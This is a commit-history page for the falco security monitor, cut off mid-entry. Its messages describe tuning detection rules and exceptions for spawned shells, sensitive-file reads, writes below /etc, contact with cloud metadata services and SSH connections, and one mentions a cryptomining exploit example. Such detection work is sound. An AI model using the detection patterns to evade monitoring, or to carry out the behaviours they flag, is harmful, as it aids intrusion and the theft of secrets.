Compare commits


102 Commits

Author SHA1 Message Date
Anoop Gupta
b99a4e5ccf Merge remote-tracking branch 'origin/dev' into agent-master 2018-04-04 15:29:24 -07:00
Mark Stemm
88327abb41 Unit test for fd.net + in operator fixes (#343)
Test fixes for https://github.com/draios/falco/issues/339. Depends on
https://github.com/draios/sysdig/pull/1091.
2018-04-04 14:23:21 -07:00
Mark Stemm
1516fe4eac Rule updates 2018 02.v3 (#344)
* add common fluentd command, let docker modify

Add a common fluentd command, and let docker operations modify bin dir

* Add abrt-action-sav(...) as an rpm program

https://linux.die.net/man/1/abrt-action-save-package-data

* Add etc writers for more ms-on-linux svcs

Microsoft SCX and Azure Network Watcher Agent.

* Let nginx write its own config.

* Let chef-managed gitlab write gitlab config

* Let docker container fsen outside of containers

The docker process can also be outside of a container when doing actions
like docker save, etc, so drop the docker requirement.

* Expand the set of haproxy configs.

Let the parent process also be haproxy_reload and add an additional
directory.

* Add an additional node-related file below /root

For node cli.

* Let adclient read sensitive files

Active Directory Client.

* Let mesos docker executor write shells

* Add additional privileged containers.

A few more openshift-related containers and datadog.

* Add a kafka admin command line as allowed shell

In this case, run by cassandra

* Add additional ignored root directories

gradle and crashlytics

* Add mesos shell spawning binaries back

This list will be limited only to those binaries known to spawn
shells. Add mesos-slave/mesos-health-ch.

* Add addl trusted containers

Consul and mesos-slave.

* Add additional config writers for sosreport

Can also write files below /etc/pki/nssdb.

* Expand selinux config progs

Rename macro to selinux_writing_conf and add additional programs.

* Let rtvscand read sensitive files

Symantec av cli program.

* Let nginx-launch write its own certificates

Sometimes directly, sometimes by invoking openssl.

* Add addl haproxy config writers

Also allow the general prefix /etc/haproxy.

* Add additional root files.

Mongodb-related.

* Add additional rpm binaries

rpmdb_stat

* Let python running get-pip.py modify binary files

Used as a part of directly running get-pip.py.

* Let centrify scripts read sensitive files

Scripts start with /usr/share/centrifydc

* Let centrify progs write krb info

Specifically, adjoin and addns.

* Let ansible run below /root/.ansible

* Let ms oms-run progs manage users

The parent process is generally omsagent-<version> or scx-<version>.

* Combine & expand omiagent/omsagent macros

Combine the two macros into a single ms_oms_writing_conf and add both
direct and parent binaries.

* Let python scripts rltd to ms oms write binaries

Python scripts below /var/lib/waagent.

* Let google accounts daemon modify users

Parent process is google_accounts(_daemon).

* Let update-rc.d modify files below /etc

* Let dhcp binaries write indirectly to etc

This allows them to run programs like sed, cp, etc.

* Add istio as a trusted container.

* Add addl user management progs

Related to post-install steps for systemd/udev.

* Let azure-related scripts write below etc

Directory is /etc/azure, scripts are below /var/lib/waagent.

* Let cockpit write its config

http://www.cockpit-project.org/

* Add openshift's cassandra as a trusted container

* Let ipsec write config

Related to strongswan (https://strongswan.org/).

* Let consul-template write to addl /etc files

It may spawn intermediate shells and write below /etc/ssl.

* Add openvpn-entrypo(int) as an openvpn program

Also allow subdirectories below /etc/openvpn.

* Add additional files/directories below /root

* Add cockpit-session as a sensitive file reader

* Add puppet macro back

Still used in some people's user rules files.

* Rename name= to program=

Some users pointed out that name= was ambiguous, especially when the
event includes files being acted upon. Change to program= (an output
sketch follows this commit).

* Also let omiagent run progs that write oms config

It can run things like python scripts.

* Allow writes below /root/.android
2018-04-02 18:10:11 -07:00
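
For reference, a rule's output string after this rename looks roughly like the following. The rule is an illustrative sketch (bin_dir and open_write are existing falco macros), not the exact shipped rule:

```
# Illustrative rule; the point is the program= field in the output string.
- rule: Write below binary dir
  desc: An attempt to write to a file below a set of binary directories
  condition: bin_dir and evt.dir = < and open_write
  output: >
    File below a known binary directory opened for writing
    (user=%user.name program=%proc.name command=%proc.cmdline file=%fd.name)
  priority: ERROR
```
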
Mark Stemm
559240b628 Example puppet module for falco (#341)
Add an example puppet module for falco. This module configures the main
falco configuration file /etc/falco/falco.yaml, providing templates for
all configuration options.

It installs falco using debian/rpm packages and installs/manages it as a
systemd service.
2018-03-28 11:50:04 -07:00
Mark Stemm
2a3ca21779 Skip output json format (#342)
* Add option to exclude output property in json fmt

New falco.yaml option json_include_output_property controls whether the
formatted string "output" is included in the json object when json
output is enabled. By default the string is included.

* Add tests for new json output option

New test sets json_include_output_property to false and then verifies
that the json output does *not* contain the surrounding text "Warning an
open...".
2018-03-28 11:24:09 -07:00
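
A minimal falco.yaml fragment showing the new option next to the existing json_output setting:

```
json_output: true
# When false, the formatted "output" string is omitted from each JSON alert.
# Defaults to true, which preserves the old behavior.
json_include_output_property: false
```
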
Mark Stemm
a3f53138d3 Example showing cryptomining exploit (#336)
An example showing how an overly permissive container environment can be
exploited to install and run cryptomining software on a host system.
2018-03-16 15:17:39 -07:00
Brett Bertocci
05c4ba1842 Merge branch 'dev' into agent-master 2018-03-08 14:47:06 -08:00
Mark Stemm
eb4feed1b6 Associate --validate with -V. (#334)
* Associate --validate with -V.

This fixes https://github.com/draios/falco/issues/322.

* Pin the version of libvirt-python to < 4.1.0

Evidently a recent libvirt-python has build problems on ubuntu. See
https://bugs.launchpad.net/openstack-requirements/+bug/1753539.

Pin to releases < 4.1.0 to avoid picking up the newer one that
has the build failure.
2018-03-08 13:03:26 -08:00
Brett Bertocci
45d467656f Merge branch 'dev' into agent-master 2018-03-08 12:38:44 -08:00
Luca Marturana
ba6d6dbf9d Use gcc 5 by default to compile properly on Ubuntu Xenial, remove gcc 4.9 since CentOS does not work anyway due to glibc 2018-02-27 09:39:13 -08:00
Mark Stemm
38eb5b8741 Add more validations (#329)
* Add the ability to validate multiple rules files

Allow multiple -V arguments just as we do with multiple -r arguments.

* With verbose output, print dangling macros/lists

Start tracking whether or not a given macro/list is actually used when
compiling the set of rules. Every macro/list has an attribute used,
which defaults to false and is set to true whenever it is referred to in
a macro/rule/list.

When run with -v, any macro/list that still has used=false results in a
warning message.

Also, it turns out the fix for
https://github.com/draios/falco/issues/197 wasn't being applied to
macros. Fix that.
2018-02-26 16:59:18 -05:00
Mark Stemm
947faca334 Rule updates 2018 02.v2 (#326)
* Let OMS agent for linux write config

Programs are omiagent/omsagent/PerformInventor/in_heartbeat_r* and files
are below /etc/opt/omi and /etc/opt/microsoft/omsagent.

* Handle really long classpath lines for cassandra

Some cassandra cmdlines are so long the classpath truncates the cmdline
before the actual entry class gets named. In those cases also look for
cassandra-specific config options.

* Let postgres binaries read sensitive files

Also add a couple of postgres cluster management programs.

* Add apt-add-reposit(ory) as a debian mgmt program

* Add addl info to debug writing sensitive files

Add parent/grandparent process info.

* Require root directory files to contain /

In some cases, a file below root might be detected but the file itself
has no directory component at all. This might be a bug with dropped
events. Make the test more strict by requiring that the file actually
contains a "/".

* Let updmap read sensitive files

Part of texlive (https://www.tug.org/texlive/)

* For selected rules, require proc name to exist

Some rules such as reading sensitive files and writing below etc have
many exceptions that depend on the process name. In very busy
environments, system call events might end up being dropped, which
causes the process name to be missing.

In these cases, we'll let the sensitive file read/write below etc to
occur. That's handled by a macro proc_name_exists, which ensures that
proc.name is not "<NA>" (the placeholder when it doesn't exist).

* Let ucf write generally below /etc

ucf is a general purpose config copying program, so let it generally
write below /etc, as long as it in turn is run by the apt program
"frontend".

* Add new conf writers for couchdb/texmf/slapadd

Each has specific subdirectories below /etc

* Let sed write to addl temp files below /etc

Let sed write to additional temporary files (some directory + "sed")
below /etc. All generally related to package installation scripts.

* Let rabbitmq(ctl) spawn limited shells

Let rabbitmq spawn limited shells that perform read-only tasks like
reading processes/ifaces.

Let rabbitmqctl generally spawn shells.

* Let redis run startup/shutdown scripts

Let redis run specific startup/shutdown scripts that trigger at
start/stop. They generally reside below /etc/redis, but we just look for
the names redis-server.{pre,post}-up in the command line.

* Let erlexec spawn shells

https://github.com/saleyn/erlexec, "Execute and control OS processes
from Erlang/OTP."

* Handle updated trace files

As a part of these changes, we updated some of the positive trace files
to properly include a process name. These newer trace files have
additional opens, so update the expected event counts to match.

* Let yum-debug-dump write to rpm database

* Additional config writers

Symantec AV for Linux, sosreport, semodule (selinux), all with their
config files.

* Tidy up comments a bit.

* Try protecting node apps again

Try improving coverage of run shell untrusted by looking for shells
below node processes again. Want to see how many FPs this causes before
fully committing to it.

* Let node run directly by docker count as a service

Generally, we don't want to consider all uses of node as a service wrt
spawned shells. But we might be able to consider node run directly by
docker as a "service". So add that to protected_shell_spawner.

* Also add PM2 as a protected shell spawner

This should handle cases where PM2 manages node apps.

* Remove dangling macros/lists

Do a pass over the set of macros/lists, removing most of those that are
no longer referred to by any macro/list. The bulk of the macros/lists
were related to the rule Run Shell Untrusted, which was refactored to
only detect shells run below specific programs. With that change, many
of these exceptions were no longer needed.

* Add a "never_true" macro

Add a never_true macro that will never match any event. Useful if you
want to disable a rule/macro/etc.

* Add missing case to write_below_etc

Add the macro veritas_writing_config to write_below_etc, which was
mistakenly not added before.

* Make tracking shells spawned by node optional

The change to generally consider node run directly in a container as a
protected shell spawner was too permissive, causing false
positives. However, there are some deployments that want to track shells
spawned by node as suspect. To address this, create a macro
possibly_node_in_container which defaults to never matching (via the
never_true macro). In a user rules file, you can override the macro to
remove the never_true clause, reverting to the old behavior (see the
sketch following this commit).

* Add some dangling macros/lists back

Some macros/lists are still referred to by some widely used user rules
files, so add them back temporarily.
2018-02-26 13:26:28 -05:00
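
The macros described in this commit can be sketched as follows. The default definitions are paraphrased from the commit text, and the override condition is a hypothetical example rather than the shipped rule set:

```
# A macro that can never match; referencing it disables whatever uses it.
- macro: never_true
  condition: (evt.num=0)

# Require that the process name was captured (not the "<NA>" placeholder).
- macro: proc_name_exists
  condition: (proc.name!="<NA>")

# Hypothetical user-rules override: drop the never_true clause so shells
# spawned below node in a container are treated as suspect again.
- macro: possibly_node_in_container
  condition: (spawned_process and container and proc.pname in (node, nodejs))
```
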
Mark Stemm
0a66bc554a Improvements to falco daemonset configuration (#325)
* Use kubernetes.default to reach k8s api server

Originally raised in #296, but since then we documented rbac and
without-rbac methods, so mirroring the change here.

* Mount docker socket/dev read-write

This matches the direct docker run commands, which also mount those
resources read-write.
2018-02-20 12:57:59 -05:00
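
A rough fragment of the daemon set pod spec after these changes. The flags follow falco's -k/-K options and the mounts mirror the docker run commands, but treat the exact values as assumptions:

```
containers:
  - name: falco
    image: sysdig/falco:latest
    args:
      - /usr/bin/falco
      # Reach the API server via the cluster-internal DNS name.
      - -k
      - https://kubernetes.default
      # Authenticate with the pod's service account token.
      - -K
      - /var/run/secrets/kubernetes.io/serviceaccount/token
    volumeMounts:
      # Mounted read-write (no readOnly flag), matching the docker run commands.
      - name: docker-socket
        mountPath: /host/var/run/docker.sock
      - name: dev-fs
        mountPath: /host/dev
```
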
Jean-Philippe Lachance
4d8e982f78 + Add gdb in the development Docker image to help debugging (#323)
sysdig-CLA-1.0-signed-off-by: Jean-Philippe Lachance <jplachance@coveo.com>
2018-02-20 11:54:13 -05:00
Jean-Philippe Lachance
52e8c16903 + Add the user_known_change_thread_namespace_binaries list to simplify "Change thread namespace" rule tweaks (#324)
sysdig-CLA-1.0-signed-off-by: Jean-Philippe Lachance <jplachance@coveo.com>
2018-02-20 11:53:25 -05:00
Mark Stemm
414c9a0eed Rule updates 2018 02.v1 (#321)
* Add additional allowed files below root.

These are related to node.js apps.

* Let yum-config-mana(ger) write to rpm database.

* Let gugent write to (root) + GuestAgent.log

vRA7 Guest Agent writes to GuestAgent.log with a cwd of root.

* Let cron-start write to pam_env.conf

* Add additional root files and directories

All seen in legitimate cases.

* Let nginx run aws s3 cp

Possibly seen as a part of consul deployments and/or openresty.

* Add rule for disallowed ssh connections

New rule "Disallowed SSH Connection" detects ssh connection attempts
other than those allowed by the macro allowed_ssh_hosts. The default
version of the macro allows any ssh connection, so the rule never
triggers by default.

The macro could be overridden in a local/user rules file, though (see
the sketch following this commit).

* Detect contacting NodePort svcs in containers

New rule "Unexpected K8s NodePort Connection" detects attempts to
contact K8s NodePort services (i.e. ports >=30000) from within
containers.

It requires overriding a macro nodeport_containers which specifies a
set of containers that are allowed to use these port ranges. By default
every container is allowed.
2018-02-20 10:06:13 -05:00
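
Hypothetical local-rules overrides for the two macros above; the addresses and image prefix are placeholders:

```
# Only ssh connections to these destinations are allowed; anything else
# fires "Disallowed SSH Connection".
- macro: allowed_ssh_hosts
  condition: (fd.sip="10.0.0.5" or fd.snet="10.0.1.0/24")

# Only containers from this registry prefix may contact NodePort services.
- macro: nodeport_containers
  condition: (container.image startswith my-registry/ingress)
```
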
Thom van Os
3912e6e44b Merge branch 'dev' into agent-master 2018-01-30 14:51:13 -08:00
Mark Stemm
1564e87177 Rule updates 2018.01.v1 (#319)
* Remove remaining fbash references.

No longer relevant after all the installer rules were removed.

* Detect contacting EC2 metadata svc from containers

Add a rule that detects attempts to contact the ec2 metadata service
from containers. By default, the rule does not trigger unless a list of
explicitly allowed containers is provided.

* Detect contacting K8S API Server from container

New rule "Contact K8S API Server From Container" looks for connections
to the K8s API Server. The ip/port for the K8s API Server is in the
macro k8s_api_server and contains an ip/port that's not likely to occur
in practice, so the rule is effectively disabled by default.
2018-01-25 16:06:15 -08:00
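
To arm the K8s API Server rule, the macro would be overridden with the cluster's real endpoint, along these lines (the address and port are placeholders):

```
- macro: k8s_api_server
  condition: (fd.sip="10.100.0.1" and fd.sport=443)
```
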
Anoop Gupta
958c0461bb Merge remote-tracking branch 'origin/dev' into agent-master 2018-01-25 15:05:25 -08:00
Mark Stemm
070a67d069 Use http dependencies (#317)
Some versions of cmake include a libcurl that doesn't have ssl support,
and verifying the md5sums should be enough.
2018-01-18 09:04:08 -08:00
Mark Stemm
1feae90c74 Rule updates vdec2 (#315)
* Additional rpm writers, root directories

salt-minion can also touch the rpm database, and some node packages
write below /root/.config/configstore.

* Add smbd as a protected shell spawner.

It's a server-like program.

* Also handle .ash_history

ash is the default shell for alpine linux

* Add exceptions for veritas

Let many veritas programs write below /etc/vx.

Let one veritas-related perl script read sensitive files.

* Allow postgres to run wal-e

https://github.com/wal-e/wal-e, archiving program for postgres.

* Let consul (agent) run addl scripts

Also let consul (agent, but the distinction is in the command line args)
run nc in addition to curl. Also rename the macro.

* Let postgres setuid to itself

Let postgres setuid to itself. Seen by archiving programs like wal-e.

* Also allow consul to run alert check scripts

"sh -c /bin/consul-alerts watch checks --alert-addr 0.0.0.0:9000 ..."

* Add additional privileged containers.

Openshift's logging support containers generally run privileged.

* Let addl progs write below /etc/lvm

Add lvcreate as a program that can write below /etc/lvm and rename the
macro to lvprogs_writing_lvm_archive.

* Let glide write below root

https://glide.sh/, package management for go.

* Let sosreport read sensitive files.

* Let scom server read sensitive files.

Microsoft System Center Operations Manager (SCOM).

* Let kube-router run privileged.

https://github.com/cloudnativelabs/kube-router

* Let needrestart_binaries spawn shells

Was included in a prior version of the shell rules; adding it back.

* Let splunk spawn shells below /opt/splunkforwarder

* Add yum-cron as an rpm binary

* Add a different way to run denyhosts.

Strange that the program is denyhosts.py but observed in actual
environments.

* Let nrpe setuid to nagios.

* Also let postgres run wal-e wrt shells

Previously added as an exception for db program spawned process, need to
add as an exception for run shell untrusted.

* Remove installer shell-related rules

They aren't used that often and removing them cleans up space for new
rules we want to add soon.
2018-01-17 20:29:45 -08:00
Mark Stemm
8aeef034a6 Remove installer-related traces
We removed the installer-related rules, so remove the installer-related
traces as well.
2018-01-17 17:40:38 -08:00
Mark Stemm
c7bcc2dce0 Addl CHANGELOG changes for 0.9.0 2018-01-17 17:00:42 -08:00
Mark Stemm
3e2f9f63d3 Update changelog/README for 0.9.0 (#316) 2018-01-17 16:58:44 -08:00
Brett Bertocci
19db7890b3 Merge branch 'dev' into agent-master 2018-01-11 17:25:47 -08:00
Michael Ducy
cef147708a Update K8S Daemon Set for RBAC & ConfigMap (#309)
* Update K8S Daemon Set for RBAC & ConfigMap

* Fix typo in command
2017-12-20 22:58:20 -05:00
Mark Stemm
1c9f86bdd8 Merge branch 'dev' into agent-master 2017-12-13 13:35:57 -08:00
Mark Stemm
db0d913acc Rule updates vdec (#307)
* Let kubelet running loopback spawn shells

Seen by @JPLachance, thanks for the heads up!

* Let docker's "exe" broadly write to files.

As a part of some docker commands like "docker save", etc, the program
exe can copy from files on the host filesystem /var/lib/docker/... to a
variety of files within the container.

Allow this via a macro exe_running_docker_save that checks the
commandline as well as the parent and use it as an exclusion for the
write below binary dir/root/etc rules.

* Let chef perform more tasks

- Let chef-client generally read sensitive files and write below /etc.
- Let python running a chef script yum-dump.py write the rpm database.
2017-12-11 22:34:50 -08:00
Luca Marturana
e0458cba67 Merge branch 'dev' into agent-master 2017-12-04 11:18:18 +01:00
Mark Stemm
af564f17a6 Add ability to override shell spawning binaries (#304)
Rename user_known_container_shell_spawn_binaries to
user_known_shell_spawn_binaries (the container distinction doesn't exist
any longer) and add it as an exception for run shell untrusted.

That way others can easily exclude shell spawning programs in a second
rules file.
2017-12-01 12:30:04 -08:00
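
A sketch of the kind of second rules file this enables; my_supervisor is a placeholder, and whether the exception is a macro (as here) or a list depends on the rules version:

```
- macro: user_known_shell_spawn_binaries
  condition: (proc.pname=my_supervisor)
```
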
Mark Stemm
cd2b210fe3 Merge branch 'dev' into agent-master 2017-11-28 09:18:58 -08:00
Mark Stemm
d6d975e28c Refactor shell rules (#301)
* Refactor shell rules to avoid FPs.

Refactoring the shell related rules to avoid FPs. Instead of considering
all shells suspicious and trying to carve out exceptions for the
legitimate uses of shells, only consider shells spawned below certain
processes suspicious.

The set of processes is a collection of commonly used web servers,
databases, nosql document stores, mail programs, message queues, process
monitors, application servers, etc.

Runsv is also considered a top-level process that denotes a
service. This gives more flexible servers, like ad-hoc nodejs express
apps, a way to denote themselves as a full server process (a sketch
follows this commit).

* Update event generator to reflect new shell rules

spawn_shell is now a silent action. Its replacement is
spawn_shell_under_httpd, which respawns itself as httpd and then runs a
shell.

db_program_spawn_binaries now runs ls instead of a shell so it only
matches db_program_spawn_process.

* Comment out old shell related rules

* Modify nodejs example to work w/ new shell rules

Start the express server using runit's runsv, which allows falco to
consider any shells run by it as suspicious.

* Use the updated argument for mkdir

In https://github.com/draios/sysdig/pull/757 the path argument for mkdir
moved to the second argument. This only became visible in the unit tests
once the trace files were updated to reflect the other shell rule
changes--the trace files had the old format.

* Update unit tests for shell rules changes

Shell in container doesn't exist any longer and its functionality has
been subsumed by run shell untrusted.

* Allow git binaries to run shells

In some cases, these are run below a service runsv so we still need
exceptions for them.

* Let consul agent spawn curl for health checks

* Don't protect tomcat

There's enough evidence of people spawning general commands that we
can't protect it.

* Reorder exceptions, add rabbitmq exception

Move the nginx exception to the main rule instead of the
protected_shell_spawner macro. Also add erl_child_setup (related to
rabbitmq) as an allowed shell spawner.

* Add additional spawn binaries

All of these are either below nginx, httpd, or runsv but should still
be allowed to spawn shells.

* Exclude shells when ancestor is a pkg mgmt binary

Skip shells when any process ancestor (parent, gparent, etc) is a
package management binary. This includes the program needrestart. This
is a deep search but should prevent a lot of other more detailed
exceptions trying to find the specific scripts run as a part of
installations.

* Skip shells related to serf

Serf is a service discovery tool and can in some cases be spawned by
apache/nginx. Also allow shells that are just checking the status of
pids via kill -0.

* Add several exclusions back

Add several exclusions back from the shell in container rule. These are
all allowed shell spawns that happen to be below
nginx/fluentd/apache/etc.

* Remove commented-out rules

This saves space as well as cleanup. I haven't yet removed the
macros/lists used by these rules and not used anywhere else. I'll do
that cleanup in a separate step.

* Also exclude based on command lines

Add back the exclusions based on command lines, using the existing set
of command lines.

* Add addl exclusions for shells

Of note is runsv, which means it can directly run shells (the ./run and
./finish scripts), but the things it runs can not.

* Don't trigger on shells spawning shells

We'll detect the first shell and not any other shells it spawns.

* Allow "runc:" parents to count as a cont entrypnt

In some cases, the initial process for a container can have a parent
"runc:[0:PARENT]", so also allow those cases to count as a container
entrypoint.

* Use container_entrypoint macro

Use the container_entrypoint macro to denote entering a container and
also allow exe to be one of the processes that's the parent of an
entrypoint.
2017-11-28 07:04:37 -08:00
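
A rough sketch of extending the protected set in a user rules file, as referenced above; proc.aname matches any process ancestor, the listed names paraphrase the commit, and my_app_server is a placeholder:

```
- macro: protected_shell_spawner
  condition: >
    (proc.aname in (apache2, nginx, mysqld, runsv, my_app_server))
```
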
Luca Marturana
5ac3e7d074 Merge branch 'dev' into agent-master 2017-11-21 12:18:56 +01:00
Mark Stemm
60af4166de Rule updates vnov (#300)
* Let supervisor write more generally below /etc

* Let perl+plesk scripts run shells/write below etc

* Allow spaces after some cmdlines

* Add additional shell spawner.

* Add addl package mgmt binaries.

* Add addl cases for java + jenkins

Addl jar files to consider.

* Add addl jenkins-related cmdlines

Mostly related to node scripts run by jenkins

* Let python running some mesos tasks spawn shells

In this case marathon run by python

* Let ucf write below etc

Only below /etc/gconf for now.

* Let dpkg-reconfigur indirectly write below /etc

It may run programs that modify files below /etc

* Add files/dirs/prefixes for writes below root

Build a set of acceptable files/dirs/prefixes for writes below
/root. Mostly triggered by apps that run directly as root.

* Add addl shell spawn binaries.

* Also let java + sbt spawn shells in containers

Not seen only at host level

* Make sure the file below etc is /etc/

Make sure the file below /etc is really below the directory etc aka
/etc/xxx. Otherwise it would match a file /etcfoo.

* Let rancher healthcheck spawn shells

The name healthcheck is relatively innocuous so also look at the parent
process.

* Add addl shell container shell spawn binaries

* Add addl x2go binaries

* Let rabbitmq write its config files

* Let rook write below /etc

toolbox.sh is fairly generic so add a condition based on the image name.

* Let consul-template spawn shells

* Add rook/toolbox as a trusted container

Their github pages recommend running privileged.

* Add addl mail binary that can setuid

* Let plesk autoinstaller spawn shells

The name autoinstaller is fairly generic so also look at the parent.

* Let php handlers write its config

* Let addl pkg-* binary write to /etc indirectly

* Add additional shell spawning binaries.

* Add ability to specify user trusted containers

New macro user_trusted_containers allows a user-provided set of
containers that are trusted and are allowed to run privileged (see the
sketch following this commit).

* If npm runs node, let node spawn shells

* Let python run airflow via a shell.

* Add addl passenger commandlines (for shells)

* Add addl ways datadog can be run

* Let find run shells in containers.

* Add rpmq as an rpm binary

* Let httpd write below /etc/httpd/

* Let awstats/sa-update spawn shells

* Add container entrypoint as a shell

Some images have an extra shell level for image entrypoints.

* Add an additional jenkins commandline

* Let mysql write its config

* Let openvpn write its config

* Add addl root dirs/files

Also move /root/.java to be a general prefix.

* Let mysql_upgrade/opkg-cl spawn shells

* Allow login to perform dns lookups

When run with -h <host> to specify a remote host, some versions of login
will do a dns lookup to try to resolve the host.

* Let consul-template write haproxy config.

* Also let mysql indirectly edit its config

It might spawn a program to edit the config in addition to editing it
directly.

* Allow certain sed temp files below /etc/

* Allow debian binaries to indirectly write to /etc

They may spawn programs like sed, touch, etc to change files below /etc.

* Add additional root file

* Let rancher healthcheck be run more indirectly

The grandparent as well as parent of healthcheck can be tini.

* Add more cases for haproxy writing config

Allow more files as well as more scripts to update the config.

* Let vmtoolsd spawn shells on the host

* Add an additional innocuous entrypoint shell

* Let peer-finder (mongodb) spawn shells

* Split application rules to separate file.

Move the contents of application rules, which have never been enabled by
default, to a separate file. It's only installed in the main falco packages.

* Add more build-related command lines

* Let perl running openresty spawn shells

* Let countly write nginx config

* Let confd spawn shells

* Also let aws spawn shells in containers.
2017-11-16 12:12:31 -08:00
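
A hypothetical override of the new macro; the registry prefix is an example, and rook/toolbox echoes the bullet above:

```
- macro: user_trusted_containers
  condition: >
    (container.image startswith my-registry/blessed-
     or container.image startswith rook/toolbox)
```
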
Brett Bertocci
d321666ee5 Merge branch 'dev' into agent-master 2017-11-10 14:08:13 -08:00
Mark Stemm
7169dd9cf0 Merge pull request #298 from draios/addl-rule-updates
Addl rule updates
2017-11-10 12:58:41 -08:00
Mark Stemm
15ed651da9 Add additional spawned shells for docker 2017-11-10 12:15:25 -08:00
Mark Stemm
7441052b9a Let consul spawn shells 2017-11-10 12:15:25 -08:00
Mark Stemm
69ede8a785 Let addl progs read sensitive files
They only display file meta-information.
2017-11-10 12:15:25 -08:00
Mark Stemm
8dd34205a8 Let java write specific config files below /etc 2017-11-10 12:15:25 -08:00
Mark Stemm
f379e97124 Let haproxy installation write its config files
The direct or parent process starts with update-haproxy- and the file is
below /etc/haproxy.
2017-11-10 12:15:25 -08:00
Mark Stemm
109f86cd85 Let ruby running pups spawn shells 2017-11-10 12:15:25 -08:00
Mark Stemm
e51fbd6569 Let python/mesos health checks spawn shells 2017-11-10 12:15:13 -08:00
Mark Stemm
060bf78ed8 Add conda as a scripting binary for builds
conda == python packaging tool
2017-11-10 12:05:28 -08:00
Mark Stemm
a2a4cbf586 Let endeca spawn shells in containers also 2017-11-09 14:17:38 -08:00
Mark Stemm
b4bd11bf70 Let nsrun spawn shells in containers. 2017-11-09 14:16:52 -08:00
Mark Stemm
d5869599f7 Add additional innocuous command lines. 2017-11-09 14:16:24 -08:00
Mark Stemm
b0bc00224c Also let terminal shells run innocuous cmdlines
The terminal shell in container rule has always been less permissive
than the other shell rules, mostly because we expect terminal-attached
shells to be less common. However, they might run innocuous commands,
especially from scripting languages like python. So allow the innocuous
commands to run.
2017-11-09 14:13:04 -08:00
Mark Stemm
2f4b39ae6f Let find spawn shells 2017-11-09 14:12:41 -08:00
Mark Stemm
326fb2998a Let curl write below the pki db
Seems to do these writes on redhat?
2017-11-09 14:11:36 -08:00
Mark Stemm
e3ef7a2ed4 Be more flexible about perl Makefile.PL
Allow the command line to start with that command.
2017-11-09 14:10:35 -08:00
Mark Stemm
43f7ee00fb Add an additional ics script ics_status.sh 2017-11-09 14:10:14 -08:00
Mark Stemm
8bcd0e8f05 Add additional cron binaries. 2017-11-09 14:09:36 -08:00
Mark Stemm
85f51cf38c Let salt-minion read sensitive files. 2017-11-08 13:42:24 -08:00
Mark Stemm
2467766f07 Add addl shell spawn conditions
flock can spawn shells; add a new allowed shell cmdline.
2017-11-08 13:41:43 -08:00
Mark Stemm
2cbff6ff70 Add addl safe root directories 2017-11-08 13:40:56 -08:00
Mark Stemm
e02135f9f0 Let datadog write its config files 2017-11-08 13:40:36 -08:00
Mark Stemm
c1de3dfe7a Let ovsdb-server write below /etc/openvswitch 2017-11-08 13:39:20 -08:00
Mark Stemm
27df0ad29b Add nagios as a monitoring binary
Runs lots of shells
2017-11-08 13:38:07 -08:00
Mark Stemm
e7c2068267 Add addl ruby binary when run by bundle 2017-11-08 13:13:00 -08:00
Mark Stemm
ffed7ef63c Add additional rpm binaries. 2017-11-08 09:28:45 -08:00
Mark Stemm
fe283dcd76 Add exceptions for /root, / writes
Java running as root as well as oracle.
2017-11-08 09:21:17 -08:00
Mark Stemm
4a0ec07235 Let celeryd spawn shells
Parent process name is strange with leading [ and trailing :, so quote
it.
2017-11-08 08:12:35 -08:00
Mark Stemm
fdebfb5b6c Add N_scheduler binaries for mesos
I believe these are related to the equivalent of docker exec for mesos
containers, and aren't specifically related to rabbitmq.
2017-11-08 08:05:42 -08:00
Mark Stemm
0b775fa722 Let java running endeca spawn shells 2017-11-07 11:19:24 -08:00
Mark Stemm
33faa911d7 Add addl npm cmdlines. 2017-11-07 11:18:33 -08:00
Mark Stemm
24fb84df60 Let docker start script spawn shells 2017-11-07 11:14:50 -08:00
Mark Stemm
7550683862 Add additional shell spawn programs. 2017-11-07 11:06:13 -08:00
Mark Stemm
5755e79fe9 Let polkit-agent-he(lper) read sensitive files. 2017-11-07 11:06:13 -08:00
Mark Stemm
dfbe450eeb Let datastax progs spawn shells
Various script-based launch points.
2017-11-07 11:06:13 -08:00
Mark Stemm
0867245b73 Let yum indirectly run user mgmt binaries
They run shells that run the user binaries, at various levels in the
process hierarchy.
2017-11-07 11:06:13 -08:00
Mark Stemm
82377348ce Add another way to run npm
This one seen on redhat installs
2017-11-07 11:00:43 -08:00
Mark Stemm
fdb2312bcf Let perl Makefile.PL spawn shells 2017-11-07 11:00:19 -08:00
Mark Stemm
fbb5451fd9 Let python running zookeeper spawn shells 2017-11-07 10:59:40 -08:00
Mark Stemm
83c309a6c0 Let subscription-ma(nager) write to rpm db. 2017-11-07 10:57:10 -08:00
Mark Stemm
6bcf397a17 Let plesk weekly cron job spawn shells 2017-11-07 10:19:42 -08:00
Mark Stemm
9ceb11a7c8 Let update-xmlcatal(og) write below /etc/xml 2017-11-07 10:19:19 -08:00
Mark Stemm
e4443bea8e Add additional make-like binaries. 2017-11-07 10:18:56 -08:00
Mark Stemm
15e2d0bf7e Add addl bitnami conditions. 2017-11-07 09:54:09 -08:00
Mark Stemm
480ba4e0f8 Let duply write below /etc/duply
It's a shell script that runs touch so the detection is slightly more
complicated.
2017-11-07 09:43:07 -08:00
Mark Stemm
6aae17600f Add addl ruby proc for builds.
Adding ruby2.1
2017-11-07 09:42:15 -08:00
Mark Stemm
e9e0177901 Add additional phusion cmdlines. 2017-11-06 15:28:16 -08:00
Mark Stemm
01459fb49a Let threatstack spawn shells
Either as tsvuln or via node cmdline.
2017-11-06 15:28:16 -08:00
Mark Stemm
d36df62d1e Add an additional yarn cmdline. 2017-11-06 15:26:03 -08:00
Mark Stemm
36d775100e Be more tolerant of es curator procs
The command line occasionally ends with a space.
2017-11-03 17:26:37 -07:00
Mark Stemm
0020b05624 Add additional details for some rules
Helps diagnose FPs.
2017-11-03 16:01:38 -07:00
Mark Stemm
3edfc6ba8e Let plesk run mktemp below /etc 2017-11-03 16:01:12 -07:00
Mark Stemm
9ed1ff5f26 Add additional shell spawning cmdlines/progs 2017-11-03 16:00:03 -07:00
Mark Stemm
664d8fbc1d Add addl mail config binaries
Add additional mail config-related binaries. Also they aren't solely
sendmail-related, so make the list mail_config_binaries.
2017-11-03 15:44:26 -07:00
Mark Stemm
6078d4bd43 Add docker-current as a docker binary. 2017-10-31 20:56:11 -07:00
Mark Stemm
53776b0ec6 Add additional /etc writers 2017-10-31 20:51:18 -07:00
Mark Stemm
2eda3432e9 Let dmeventd write additional dirs 2017-10-31 20:50:58 -07:00
Mark Stemm
56e07f53f2 Let appdynamics spawn shells.
It's java, so look in classpath.
2017-10-30 22:57:08 -07:00
Mark Stemm
